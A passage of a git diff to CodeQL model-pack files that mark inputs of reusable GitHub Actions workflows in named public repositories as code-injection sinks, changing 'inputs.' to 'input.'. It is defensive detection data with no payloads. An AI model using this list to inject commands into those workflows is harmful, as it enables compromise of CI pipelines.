@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["alphagov/publishing-api/.github/workflows/pact-verify.yml", "*", "inputs.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file + - ["alphagov/publishing-api/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml index ad061ca714d..3c790f81d74 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml 
@@ -3,13 +3,13 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "inputs.module", "code-injection", "generated"] - - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "inputs.jdk", "code-injection", "generated"] - - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "inputs.sql_compatibility", "code-injection", "generated"] - - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "inputs.override_config_path", "code-injection", "generated"] - - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "inputs.testing_groups", "code-injection", "generated"] - - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "inputs.use_indexer", "code-injection", "generated"] - - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "inputs.runtime_jdk", "code-injection", "generated"] - - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "inputs.it", "code-injection", "generated"] - - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "inputs.script", "code-injection", "generated"] - - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "inputs.build_jdk", "code-injection", "generated"] \ No newline at end of file + - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.module", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.jdk", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.sql_compatibility", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "input.override_config_path", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "input.testing_groups", "code-injection", "generated"] + - 
["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "input.use_indexer", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "input.runtime_jdk", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "input.it", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "input.script", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "input.build_jdk", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml index 3a721a0f2cf..50fdcfd5a2d 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "inputs.environment", "code-injection", "generated"] - - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "inputs.workflow-caller-id", "code-injection", "generated"] \ No newline at end of file + - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "input.environment", "code-injection", "generated"] + - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "input.workflow-caller-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml index bdabbb9ab60..6363564503c 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/spark/.github/workflows/build_and_test.yml", "*", "inputs.branch", "code-injection", "generated"] - - ["apache/spark/.github/workflows/build_and_test.yml", "*", "inputs.jobs", "code-injection", "generated"] \ No newline at end of file + - ["apache/spark/.github/workflows/build_and_test.yml", "*", "input.branch", "code-injection", "generated"] + - ["apache/spark/.github/workflows/build_and_test.yml", "*", "input.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml index 6d8438462a8..fce736676fe 100644 --- a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["argilla-io/argilla/.github/workflows/run-python-tests.yml", "*", "inputs.pytestArgs", "code-injection", "generated"] \ No newline at end of file + - ["argilla-io/argilla/.github/workflows/run-python-tests.yml", "*", "input.pytestArgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml index 6d7bf7af0c2..593322a739e 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "inputs.docker_image_name", "code-injection", "generated"] - - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "inputs.ghcr_image_name", "code-injection", "generated"] - - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "inputs.quay_image_name", "code-injection", "generated"] \ No newline at end of file + - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] + - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.ghcr_image_name", "code-injection", "generated"] + - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.quay_image_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml index b3b198fbf65..b3984a7ab83 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "inputs.docker_image_name", "code-injection", "generated"] - - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "inputs.ghcr_image_name", "code-injection", "generated"] - - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "inputs.quay_image_name", "code-injection", "generated"] \ No newline at end of file + - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] + - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.ghcr_image_name", "code-injection", "generated"] + - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.quay_image_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml index 9c3ae9bf194..a6f1bd4569d 100644 --- a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["aws-amplify/amplify-ui/.github/workflows/reusable-tagged-publish.yml", "*", "inputs.dist-tag", "code-injection", "generated"] \ No newline at end of file + - ["aws-amplify/amplify-ui/.github/workflows/reusable-tagged-publish.yml", "*", "input.dist-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml index 68a85006c6c..b661a1fa26a 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["azure/apiops/tools/github_workflows/run-publisher-with-env.yaml", "*", "inputs.API_MANAGEMENT_SERVICE_OUTPUT_FOLDER_PATH", "code-injection", "generated"] \ No newline at end of file + - ["azure/apiops/tools/github_workflows/run-publisher-with-env.yaml", "*", "input.API_MANAGEMENT_SERVICE_OUTPUT_FOLDER_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml index ee336ee076c..0f58971041d 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml 
@@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["azure/mlops-templates/.github/workflows/tf-gha-install-terraform.yml", "*", "inputs.terraform_workingdir", "code-injection", "generated"] - - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "inputs.parameters-file", "code-injection", "generated"] - - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "inputs.workspace_name", "code-injection", "generated"] - - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "inputs.resource_group", "code-injection", "generated"] - - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "inputs.dockerfile-location", "code-injection", "generated"] - - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "inputs.environment_file", "code-injection", "generated"] - - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "inputs.workspace_name", "code-injection", "generated"] - - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "inputs.resource_group", "code-injection", "generated"] \ No newline at end of file + - ["azure/mlops-templates/.github/workflows/tf-gha-install-terraform.yml", "*", "input.terraform_workingdir", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "input.parameters-file", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "input.workspace_name", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "input.resource_group", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "input.dockerfile-location", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "input.environment_file", "code-injection", "generated"] + - 
["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "input.workspace_name", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "input.resource_group", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml index 3d3f727923a..f12a337d71d 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "inputs.git-user-email", "code-injection", "generated"] - - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "inputs.git-user-name", "code-injection", "generated"] - - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "inputs.track", "code-injection", "generated"] - - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "inputs.package-name", "code-injection", "generated"] \ No newline at end of file + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-name", "code-injection", "generated"] + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.track", "code-injection", "generated"] + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.package-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml index f18d1e4c50a..76796b4ae38 100644 
--- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "inputs.git-user-email", "code-injection", "generated"] - - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "inputs.git-user-name", "code-injection", "generated"] - - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "inputs.track", "code-injection", "generated"] - - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "inputs.package-name", "code-injection", "generated"] \ No newline at end of file + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-name", "code-injection", "generated"] + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.track", "code-injection", "generated"] + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.package-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml index 21db2585a5e..8cc08edff5d 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "inputs.shell", "code-injection", "generated"] - - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "inputs.environment", "code-injection", "generated"] \ No newline at end of file + - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "input.shell", "code-injection", "generated"] + - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "input.environment", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml index 3f263608c21..c2963eb76f4 100644 --- a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bdunderscore/modular-avatar/.github/workflows/build-test-docs.yml", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["bdunderscore/modular-avatar/.github/workflows/build-test-docs.yml", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml index 017d0bc89f5..66aea90b41a 100644 --- a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["benc-uk/workflow-dispatch/.github/workflows/echo-3.yaml", "*", "inputs.message", "code-injection", "generated"] \ No newline at end of file + - ["benc-uk/workflow-dispatch/.github/workflows/echo-3.yaml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml index 1a38d6b35ad..49ed7bca899 100644 --- a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "inputs.REGISTRY", "code-injection", "generated"] - - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "inputs.IMAGE_NAME", "code-injection", "generated"] - - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "inputs.IMAGE_TAG", "code-injection", "generated"] \ No newline at end of file + - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.REGISTRY", "code-injection", "generated"] + - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.IMAGE_NAME", "code-injection", "generated"] + - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.IMAGE_TAG", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml index 339d7b1dd0a..fd0a2d9110a 100644 
--- a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bugsnag/bugsnag-ruby/.github/workflows/run-maze-runner.yml", "*", "inputs.features", "code-injection", "generated"] \ No newline at end of file + - ["bugsnag/bugsnag-ruby/.github/workflows/run-maze-runner.yml", "*", "input.features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml index ff0f83454c2..1a3bdd1b380 100644 --- a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml 
@@ -3,20 +3,20 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.the_path", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.last_commit", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.binary_name_stem", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamrc.yml", "*", "inputs.ver_num", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamrc.yml", "*", "inputs.runner", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_vscode_ext.yml", "*", "inputs.ver_num", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.ver_num", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.runner", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.config_file", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.wasi_sdk_url", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.wamr_app_framework_url", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "inputs.ver_num", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "inputs.runner", "code-injection", "generated"] - - 
["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "inputs.wasi_sdk_url", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_llvm_libraries.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_llvm_libraries.yml", "*", "inputs.os", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_iwasm_release.yml", "*", "inputs.ver_num", "code-injection", "generated"] \ No newline at end of file + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.the_path", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.last_commit", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.binary_name_stem", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamrc.yml", "*", "input.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamrc.yml", "*", "input.runner", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_vscode_ext.yml", "*", "input.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "input.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "input.runner", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "input.config_file", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "input.wasi_sdk_url", "code-injection", "generated"] + - 
["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "input.wamr_app_framework_url", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "input.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "input.runner", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "input.wasi_sdk_url", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_llvm_libraries.yml", "*", "input.arch", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_llvm_libraries.yml", "*", "input.os", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_iwasm_release.yml", "*", "input.ver_num", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml index c07d2aba0b6..6185f9d03d0 100644 --- a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "inputs.destination-tag", "code-injection", "generated"] - - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "inputs.origin-tag", "code-injection", "generated"] \ No newline at end of file + - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "input.destination-tag", "code-injection", "generated"] + - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "input.origin-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml index 77a7eaae309..273bbc69540 100644 --- a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cemu-project/cemu/.github/workflows/build.yml", "*", "inputs.experimentalversion", "code-injection", "generated"] \ No newline at end of file + - ["cemu-project/cemu/.github/workflows/build.yml", "*", "input.experimentalversion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml index 09299774b6a..3aac3af3cae 100644 --- a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml 
@@ -3,27 +3,27 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "inputs.test-package-base-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.unreal-engine-association", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.test-package-base-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.visual-studio-version", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.visual-studio-components", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "inputs.unreal-engine-version", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "inputs.upload-package-base-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.unreal-engine-version", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.cmake-generator", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.cmake-platform", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.cmake-toolchain", "code-injection", "generated"] - - 
["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.upload-package-base-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.extra-choco-packages", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.visual-studio-version", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.visual-studio-components", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "inputs.unreal-engine-version", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "inputs.upload-package-base-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildLinux.yml", "*", "inputs.unreal-engine-version", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildLinux.yml", "*", "inputs.clang-version", "code-injection", "generated"] \ No newline at end of file + - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "input.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "input.test-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "input.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "input.unreal-engine-association", "code-injection", "generated"] + - 